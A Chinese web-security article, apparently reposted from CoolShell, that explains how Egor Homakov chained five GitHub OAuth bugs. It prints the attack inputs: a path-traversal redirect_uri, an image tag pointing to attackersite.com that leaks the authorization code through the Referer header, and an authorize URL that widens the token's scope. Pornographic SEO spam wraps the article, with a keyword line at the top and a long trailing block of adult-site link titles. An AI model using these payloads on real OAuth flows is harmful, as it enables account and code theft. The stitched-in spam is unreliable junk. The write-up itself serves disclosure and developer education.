精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

從“黑掉Github”學Web安全開發

開發 前端
首先,這個故事要從Github OAuth講起。所以,我們需要先知道什么是OAuth。所謂OAuth就是說,第三方的應用可以通過你的授權而不用知道你的帳號密碼能夠訪問你在某網站的你自己的數據或功能。

Egor Homakov(Twitter: @homakov 個人網站: EgorHomakov.com)是一個Web安全的布道士,他這兩天把github給黑了,并給github報了5個安全方面的bug,他在他的這篇blog——《How I hacked Github again》(墻)說明了這5個安全bug以及他把github黑掉的思路。Egor的這篇文章講得比較簡單,很多地方一筆帶過,所以,我在這里用我的語言給大家闡述一下黑掉Github的思路以及原文中所提到的那5個bug。希望這篇文章能讓從事Web開發的同學們警惕。關于Web開發中的安全事項,大家可以看看這篇文章《Web開發中的你需要了解的東西

[[108973]] 

OAuth簡介

首先,這個故事要從Github OAuth講起。所以,我們需要先知道什么是OAuth。所謂OAuth就是說,第三方的應用可以通過你的授權而不用知道你的帳號密碼能夠訪問你在某網站的你自己的數據或功能。像Google, Facebook, Twitter等網站都提供了OAuth服務,提供OAuth服務的網站一般都有很多開放的API,第三方應用會調用這些API來開發他們的應用以讓用戶擁有更多的功能,但是,當用戶在使用這些第三方應用的時候,這些第三方的應用會來訪問用戶的帳戶內的功能和數據,所以,當第三應用要干這些事的時候,我們不能讓第三方應用彈出一個對話框來問用戶要他的帳號密碼,不然第三方的應用就把用戶的密碼給獲取了,所以,OAuth協議會跳轉到一個頁面,讓用戶授權給這個第三方應用以某些權限,然后,這個權限授權的記錄保存在Google/Facebook/Twitter上,并向第三方應用返回一個授權token,于是第三方的應用通過這個token來操作某用戶帳號的功能和數據時,就暢通無阻了。下圖簡單地說明了Twitter的OAuth的授權過程。

從上面的流程圖中,我們可以看OAuth不管是1.0還是2.0版本都是一個比較復雜的協議,所以,在Server端要把OAuth實現對并不是一些容易事,其總是或多或少會有些小錯誤。Egor就找到了幾個Github的OAuth的實現的問題。

OAuth的Callback

還需要注意的是,因為OAuth是需要跳到主站的網頁上去讓用戶授權,當用戶授權完后,需要跳轉回原網頁,所以,一般來說,OAuth授權頁都會帶一個 redirect_url的參數,用于指定跳轉回原來的網頁。Github使用的這個跳轉參數是redirect_uri參數。一般來說,redirect_uri這個參數需要在服務器端進行驗證。

你想一下,如果有人可以控制這個redirect_uri這個參數,那么,你就可以讓其跳轉到別的網頁上(可能會是個有惡意的網頁)。如果你覺得跳轉到別的網頁上也無所謂,那么你就錯了。別忘了,當你對這個第三方的應用授權通過后,服務方會給第三方應用返回一個授權token,這個token會被加到那個redirect_uri參數后面然后跳轉回去,如果這個redirect_uri被別有用心的人改一個惡意的網址后,這個token也就被轉過去了,于是授權token也就被泄漏過去了。

知道了這一切,我們就可以理解Egor提的那5個bug是什么意思了。

***個Bug:沒有檢查重定向URL中的/../

 

首先,我們通過Github的 redirect_uri 的說明文檔我們可以看到這樣的說明:

  1. 如果 CALLBACK URL是: http://example.com/path  
  2.    
  3. GOOD: https://example.com/path  
  4. GOOD: http://example.com/path/subdir/other  
  5.    
  6. BAD: http://example.com/bar  
  7. BAD: http://example.com/  
  8. BAD: http://example.com:8080/path  
  9. BAD: http://oauth.example.com:8080/path  
  10. BAD: http://example.org 

而Github對于redirect_uri做了限制,要求只能跳回到 https://gist.github.com/auth/github/callback/,也就是說,域名是gist.github.com,目錄是/auth/github/callback/,服務器端做了這個限制,看似很安全了。

但是,Egor發現,Github的服務器端并沒有驗證.. /../../這樣的情況。

于是,Egor相當于構造了一個下面這樣的Redirect URL:

https://gist.github.com/auth/github/callback/../../../homakov/8820324?code=CODE

于是上面的URL就相當于:

https://gist.github.com/homakov/8820324?code=CODE

你可以看到,認證后的跳轉網頁轉到了別的地方去(并非是github限制的地方)——我們知道Github的gist雖然是給你分享代碼片段的,但是也可以用來定制自己的東西的(比如markdown),這個gist的網頁當然是被Egor所控制的。

#p#

第二個BUG:沒有校驗token

***個bug其實并沒有什么,如果服務器端要校驗一下token是否和之前生成的token的redirect_uri一模一樣,只要服務器做了這個驗證,***個bug完全沒有什么用處,但是,github的服務端并沒有驗證。

這就是第二個bug,于是***個和第二個bug組合起來成了一個相當有威力的安全漏洞。

也就是說,token的生成要考慮redirect_uri,這樣,當URL跳轉的時候,會把redirect_uri和token帶到跳轉頁面(這里的跳轉頁面還是github自己的),跳轉頁面的服務端程序要用redirect_uri來生成一個token,看看是不是和傳來的token是一個樣的。這就是所謂的對URL進行簽名——以保證URL的不被人篡改。一般來說,對URL簽名和對簽名驗證的因子包括,源IP,服務器時間截,session,或是再加個salt什么的。

第三個BUG:注入跨站圖片

現在,redirect_uri帶著code,安全順利地跳到了Egor構造的網頁上:

https://gist.github.com/homakov/8820324?code=CODE

但是,這個是gist的網頁,你無法在這個頁面上運行前端(Javascript)或后端程序(Ruby——Github是Ruby做的),現在的問題是我們怎么得到那個code,因為那個code雖然后帶到了我的網頁上來,但那個網頁還是github和用戶自己的環境。

到這里,一般來說,黑客會在這個頁面上放一個諸如下面的一個鏈接,來引誘用戶點擊,:

<a href=http://hack.you.com/>私人照片</a>

這樣,當頁面跳轉到黑客的網站上來后,你之前的網頁上的網址會被加在http頭里的 Refere 參數里,這樣,我就可以得到你的token了。

但是,在gist上放個鏈接還要用戶去點一下,這個太影響“用戶體驗”了,***能嵌入點外部的東西。gist上可以嵌入外站的圖片,但是github的開發人員并非等閑之輩,對于外站的圖片,其統統會把這些圖片的url代理成github自己的url,所以,你很難搞定。

不過,我們可以用一個很詭異的技巧:

<img src=”///attackersite.com”>

這個是什么玩意?這個是個URL的相對路徑。但是為什么會有三個///呢?呵呵。

像程序員一樣的思考

這個時候,我們需要以“程序員的編程思維”來思考問題——如果你是程序員,你會怎么寫校驗URL的程序?你一定會想到使用正則表達式,或是用程序來匹配URL中的一些pattern。于是,

  • 對于絕對路徑:你會匹配兩個//,后面的可能會是 user@host.com(user@是可選的),然后可能會有:<n>端口號,然后是/,后面是服務器的路徑,再往后面應該是?后面帶一些參數了。

  • 對于相對路徑:就沒有絕對路徑那么復雜了。就是些 .. 和 /再加上?和一些參數。

好了,如果coolshell.cn網頁中的<img src=>或<a href=>中用到的相對路徑是 /host.com,那么瀏覽器會解釋成:http://coolshell.cn/host.com,如果是///host.com,那么就應該被瀏覽器解釋成 http://coolshell.cn///host.com。

但是,Chrome和Firefox,會把///host.com當成絕對路徑,因為其正確匹配了絕對路徑的scheme。如果你正在用Chrome/Firefox看這篇文章 ,你可以看看下面的連接(源碼如下):

CoolShell Test

  1. <a href="///www.google.com">CoolShell Test</a> 

關鍵是,這個Chrome/Firefox的問題被標記成了Won’t Fix,我勒個去,基本上來說,后臺的程序也有可能有這樣的問題,對于Perl,Python,Ruby,Node.js,PHP帶的URL檢查的函數庫都有這樣的問題。

于是,我們就可以使用這樣的方式給gist注入了一個第三方站點的圖片(github的服務端沒有察覺到(因為我們前面說過大多數語言的URL檢查庫都會被 Bypass了),但是瀏覽器端把這個鏈接解釋到了第三方的站點上),于是請求這個圖片的http頭中的refere 中包含用戶當前頁面的URL,也包含了用戶授權的code。

到這里,黑客Egor已經拿到用戶gist的權限并可以修改或查看用戶私用的gist了。但是作者并沒有滿足,他想要的更多。

第四個bug:Gist把github_token放在了cookie里

于是Egor在用戶的cookie里找到了 github_token

但是這個token沒什么用,因為授權的Scope只有gists。但是,這個token不應該放在用戶端的cookie里,本身就是一個安全事故,這個東西只能放在服務端(關于Web開發中的安全事項,可以看看這篇文章《Web開發中的你需要了解的東西》)。

于是,Egor只能另謀出路。

第五個Bug:自動給gist授權

因為gist是github自家的,Egor所以估計github想做得簡單一點,當用戶訪問gist的時候,不會出彈出一個OAuth的頁面來讓用戶授權,不然,用戶就會很詫異,都是你們自家的東西,還要授權?所以,Egor猜測github應該是對gist做了自動授權,于是,Egor搞了這樣的一個URL(注意其中的 redirect_uri中的scope )

https://github.com/login/oauth/authorize?client_id=7e0a3cd836d3e544dbd9&redirect_uri=https%3A%2F%2Fgist.github.com%2Fauth%2Fgithub%2Fcallback/../../../homakov/8820324&response_type=code&scope=repo,gists,user,delete_repo,notifications

于是,這個redirect-uri不但幫黑客拿到了訪問gist的token,而且還把授權token的scope擴大到了用戶的代碼庫等其它權限。于是你就可以黑入用戶的私有代碼區了。

#p#

其它 & 感想

于是,作者從 Github Security Bug Bounty 拿到了USD $4,000的獎勵!Egor一共花了從下午2點到6點一共4個小時找到了這些Bug,平均一小時1000美刀。Egor還很得瑟的說,如果Github請他做安全顧問,他只收一小時USD $400刀,這4個小時也就$1,600。呵呵。大家看看,這是多么有效率的賺錢方式。

下圖是Github上的賞金獵手的排行榜(https://bounty.github.com/index.html#leaderboard)你可以上去挨個看看他們找到的問題,你會發現好些安全問題都很小,有些只能說是不是很規范的問題,Github都賞了幾百刀。我查看了一下github的賞金政策,github賞金至少100刀,到5000刀不等。

讓我們捫心自問一下,我們花了多少時間在玩那些“紅包游戲”,而又搞到了多少紅包?人家4個小時找了5個bug,掙了$4000美金。老天給了你我一樣的時間,我們用來抽幾塊錢的紅包,人家用自己的技能來掙獎金。這就是人和人的差距。這就是所謂的效率——你可以移步看看我寫的《加班與效率

原文鏈接:http://coolshell.cn/articles/11021.html

責任編輯:林師授 來源: 酷殼
相關推薦

2014-02-11 13:49:00

2014-12-03 13:26:24

JavaScript

2015-05-11 10:16:20

2012-09-07 10:54:06

2011-12-26 15:50:54

2020-04-17 13:27:05

安全開發網絡安全網絡攻擊

2012-04-24 09:58:26

2019-06-06 12:11:42

2010-12-01 12:37:03

2009-03-26 13:59:43

2013-12-17 14:07:37

2022-01-26 07:47:22

黑客漏洞網絡安全

2016-10-24 14:04:24

2016-05-18 09:52:20

2014-11-19 10:08:47

2019-02-14 13:21:31

2017-02-16 13:33:54

2015-06-11 10:03:05

2015-04-27 13:54:10

2015-08-11 14:10:25

點贊
收藏

51CTO技術棧公眾號

黄色动漫在线观看| 成人a v视频| 牛牛影视久久网| 在线观看日韩国产| 日韩video| 欧美一区二区三区少妇| 精品综合久久久久久8888| 欧美激情免费看| 免费黄在线观看| swag国产精品一区二区| 欧美亚一区二区| 国产毛片久久久久久国产毛片| 欧美69xxxxx| 国产成人啪午夜精品网站男同| 国产97在线视频| 欧美精品99久久久| 久久亚洲在线| 亚洲精品自拍第一页| 国产在线视频三区| 四虎4545www国产精品| 亚洲一区欧美一区| 一个色的综合| 久久精品蜜桃| 99精品在线观看视频| 成人av在线天堂| 无码任你躁久久久久久久| 国产精品v亚洲精品v日韩精品 | 国产区在线视频| 成人黄色大片在线观看 | 欧美成人精品欧美一级乱| 怡红院在线观看| 国产精品久久久久久久久晋中 | 成人区精品一区二区不卡| 久久人人97超碰com| 国产精品久久九九| 国产成人免费看一级大黄| 毛片一区二区三区| 国产精品久久精品| 欧美一级淫片免费视频黄| 亚洲精品社区| 97精品国产97久久久久久免费| 丰满少妇高潮久久三区| 91蜜臀精品国产自偷在线 | 午夜av在线免费观看| 国产精品久久久久一区| 日韩电影天堂视频一区二区| 四虎影院在线域名免费观看| www.成人网.com| 成人一区二区三区四区| 黄色www视频| 成人免费观看视频| 国产精品免费一区二区三区在线观看| 国产福利视频导航| 国产精品一卡二卡在线观看| 91视频国产一区| 国产精品永久久久久久久久久| 久久99精品国产91久久来源| 91精品久久久久久久久中文字幕 | 成人福利视频在线看| 国产高清在线一区二区| 丰满肥臀噗嗤啊x99av| 成人一级片在线观看| 国产成人av一区二区三区| 亚洲成人77777| 成人高清伦理免费影院在线观看| 国产中文一区二区| 欧美日韩国产中文字幕在线| 国产亚洲一区字幕| 亚洲自拍偷拍二区| 新版中文在线官网| 亚洲成人资源在线| 久久久噜噜噜www成人网| 免费观看一级欧美片| 色素色在线综合| 一区二区三区欧美精品| 日韩有吗在线观看| 亚洲精品国产综合久久| 91网站免费视频| 99精品小视频| 色综合久综合久久综合久鬼88| 久久精品久久国产| 久久亚洲精品伦理| 成人亚洲欧美一区二区三区| 亚洲精品一级片| 99精品视频在线播放观看| 欧美一区二视频在线免费观看| 1024国产在线| 午夜精品一区二区三区电影天堂 | 日韩成人三级视频| 老司机2019福利精品视频导航| 欧美日韩一卡二卡| 国产国语老龄妇女a片| 国产欧美高清视频在线| 久久综合伊人77777蜜臀| 国产精品一区二区6| 蜜桃视频在线观看一区| 成人在线观看av| 成年在线电影| 亚洲成av人在线观看| 亚洲这里只有精品| 国内精品偷拍| www欧美日韩| 中文在线第一页| 成人在线视频首页| 中文字幕制服丝袜在线| 日韩大片免费观看| 日韩精品一区二区三区三区免费| 谁有免费的黄色网址| 韩国自拍一区| 成人性生交大片免费看视频直播| 久久电影视频| 精品久久久久久| 无套内谢丰满少妇中文字幕| 精品久久久久久久久久久aⅴ| 欧美黑人巨大精品一区二区| 一本久道久久综合无码中文| 久久久久国产一区二区三区四区| av片在线免费| 欧美成人精品一级| 中文字幕视频在线免费欧美日韩综合在线看| 久草视频在线免费看| 美国一区二区三区在线播放| 久久综合九九| 国产高清中文字幕在线| 日韩欧美高清在线| 日韩欧美综合视频| 久久国产精品一区二区| 欧美一区2区三区4区公司二百| 久久亚洲导航| 欧美一个色资源| 亚洲欧美另类日本| 琪琪一区二区三区| 图片区小说区区亚洲五月| 制服丝袜专区在线| 精品调教chinesegay| 日韩精品国产一区二区| 高清国产一区二区| 国产亚洲精品久久久久久久| 精品国模一区二区三区欧美| 久久精品青青大伊人av| 亚洲无码精品国产| 国产精品欧美经典| www.这里只有精品| 成人av二区| 国产精品丝袜一区二区三区| eeuss影院www在线播放| 在线一区二区三区四区五区| 国产高潮呻吟久久| 视频一区中文字幕| 午夜一区二区三视频在线观看| 免费观看成人性生生活片| 亚洲人成啪啪网站| 一级一级黄色片| 中文字幕乱码久久午夜不卡 | 国产精品午夜av| 久久免费视频在线观看| 天堂中文在线资源| 欧美日韩在线另类| 奇米网一区二区| 精品无码三级在线观看视频| 亚洲国产精品女人| 99精品国产一区二区三区2021| 91国自产精品中文字幕亚洲| 青青草av免费在线观看| 在线亚洲高清视频| www.com.av| 国产福利不卡视频| koreanbj精品视频一区| 国产伦一区二区三区| 国产日韩欧美中文在线播放| 国产精品刘玥久久一区| 日韩一级精品视频在线观看| 国产午夜精品无码一区二区| 久久久久久久综合色一本| 午夜两性免费视频| 国产精品啊v在线| 欧美美乳视频网站在线观看| 国产福利一区二区三区在线播放| 久久国产精品影视| 五月婷婷激情在线| 欧美日韩精品福利| 国产精品99精品无码视| 国产亚洲一区二区三区四区| 久久久久久国产精品日本| 最新国产乱人伦偷精品免费网站| 日本在线播放一区| 欧美激情精品| 国产精品va在线播放我和闺蜜| 午夜激情视频在线| 日韩国产激情在线| 国产精品久久久久久久一区二区| 亚洲高清在线视频| 天堂在线中文视频| 成人久久久精品乱码一区二区三区| 青青在线视频免费| 欧美日韩网站| 特级西西444www大精品视频| eeuss国产一区二区三区四区| 国产精品久久av| 大菠萝精品导航| 久久伊人精品视频| 欧美美女搞黄| 精品国产一二三区| 92久久精品一区二区| 欧美日韩国产一区二区| 91禁男男在线观看| www一区二区| 免费黄色在线播放| 蓝色福利精品导航| 国内外成人激情视频| 欧美片第1页综合| 亚洲欧洲精品一区| 精品一区免费| 狠狠色综合一区二区| 国产精品xnxxcom| 国产精品久久久久久亚洲调教| 大桥未久在线视频| 久久久噜噜噜久久久| www免费在线观看| 中文字幕一精品亚洲无线一区 | 黄色国产小视频| 亚洲久久视频| 日本大片免费看| 一本一本久久a久久综合精品| 亚洲欧美电影在线观看| 国产亚洲一卡2卡3卡4卡新区| 国产伦精品一区二区三区免| 91成人短视频| 91嫩草免费看| 精品午夜av| 亚洲va欧美va国产综合久久| 四虎国产精品免费久久5151| 国产精品久久久91| 成人免费视频观看| 国产日产久久高清欧美一区| 8av国产精品爽爽ⅴa在线观看| 91高清免费在线观看| 国内精彩免费自拍视频在线观看网址| 欧美日韩高清区| 日本三级在线观看网站| 欧美激情精品久久久久久大尺度| av免费在线免费| 欧美成人一二三| 欧美xxxx做受欧美88bbw| 欧美成人午夜激情视频| av中文字幕在线观看| 久久婷婷国产麻豆91天堂| 国产网站在线免费观看| 欧美精品一二区| 欧美videossex| 国模精品视频一区二区| av今日在线| 日本欧美国产在线| 91av一区| 91精品国产99久久久久久红楼| 欧美片网站免费| 国产精品免费区二区三区观看| 欧美黑人巨大videos精品| 欧美激情www| 欧美日韩一区二区综合| 一区二区三区四区视频在线观看| 91久久电影| 青青在线视频免费观看| 1024成人| caoporn超碰97| 精品一区二区成人精品| 国产大学生av| 久久色在线观看| 91ts人妖另类精品系列| 一区二区三区在线视频观看58| 日韩精品一区三区| 色综合色狠狠天天综合色| 久久久999久久久| 欧美一卡2卡三卡4卡5免费| 黄色小视频免费观看| 亚洲老头老太hd| 在线观看精品一区二区三区| 九九精品视频在线| 第84页国产精品| 成人黄在线观看| 麻豆视频一区| 一区二区国产日产| 在线欧美福利| 国产又黄又猛又粗又爽的视频| 国产成人在线色| 91精彩刺激对白露脸偷拍| 国产激情视频一区二区三区欧美| 午夜在线电影亚洲一区| 国产精品国产自产拍高清av水多| 国产人成网在线播放va免费| 国产69精品久久久| 久久亚洲人体| 亚洲天堂影视av| 久久9999久久免费精品国产| 一本久久综合亚洲鲁鲁五月天| 91麻豆视频在线观看| 亚洲福利在线观看| 免费观看在线午夜影视| 69视频在线免费观看| 午夜在线小视频| 99久久99久久精品国产片桃花| 国产乱码精品一区二区三区不卡| 精品国产中文字幕第一页| 日韩精品综合在线| 久久成人麻豆午夜电影| av黄色一级片| 中文字幕佐山爱一区二区免费| 国产成人在线免费视频| 91精品国产一区二区三区| 国产色a在线| 91国偷自产一区二区三区的观看方式| 亚洲综合资源| 日本一区视频在线播放| 亚洲一区二区伦理| 波多野结衣办公室双飞| 日韩一区在线播放| 制服丝袜在线一区| 日韩禁在线播放| japanese色国产在线看视频| 成人亚洲综合色就1024| 欧美在线电影| 波多野结衣天堂| 91啦中文在线观看| 日韩伦人妻无码| 精品剧情v国产在线观看在线| 久热国产在线| 国产深夜精品福利| 成人嫩草影院| 毛葺葺老太做受视频| 26uuu成人网一区二区三区| 日本高清www免费视频| 精品国产91久久久久久久妲己 | 中文av字幕一区| 国产免费一级视频| 亚洲日本成人女熟在线观看| 天堂资源在线| 品久久久久久久久久96高清| 亚洲一区国产| 亚洲人成人无码网www国产| 欧美日韩在线另类| 久草视频在线看| 国产精品吊钟奶在线| 国产麻豆精品久久| www.色偷偷.com| 成人欧美一区二区三区视频网页 | 99久久精品一区二区| 免费无遮挡无码永久在线观看视频| 日韩视频免费观看高清完整版在线观看| 黄色免费网站在线观看| 99久久精品免费看国产一区二区三区 | av午夜精品一区二区三区| 欧美日韩综合在线观看| 亚洲激情自拍图| 欧美电影免费看| 亚洲激情啪啪| 国产在线不卡一区| 久久精品波多野结衣| 日韩av网站大全| 波多视频一区| 亚洲黄色一区二区三区| 国产老女人精品毛片久久| 久久久久黄色片| 亚洲激情在线观看| www.26天天久久天堂| 黄色www在线观看| 成人激情免费网站| 秋霞av一区二区三区| 久久精品视频在线| 国产一区二区在线视频你懂的| 欧美极品欧美精品欧美| 亚洲国产精品v| 国产xxxx在线观看| 57pao成人国产永久免费| 国内精品视频在线观看| 男插女视频网站| 五月激情综合网| 91社区在线高清| 国产成人亚洲欧美| 日韩国产高清影视| 九九视频免费观看| 亚洲男人av电影| 欧一区二区三区| 99蜜桃臀久久久欧美精品网站| 亚洲欧洲三级电影| 天天操天天射天天舔| 成人国产精品久久久| 好吊日精品视频| 国产调教在线观看| 欧美精品一区二区精品网| 91精品店在线| 免费看黄在线看| 国产精品国产馆在线真实露脸 | 中文字幕网址在线| 久久久久久18| 日韩国产欧美| 中出视频在线观看| 日韩一区二区电影网| 台湾成人免费视频| 亚洲人成无码网站久久99热国产 | 国产亚洲免费的视频看|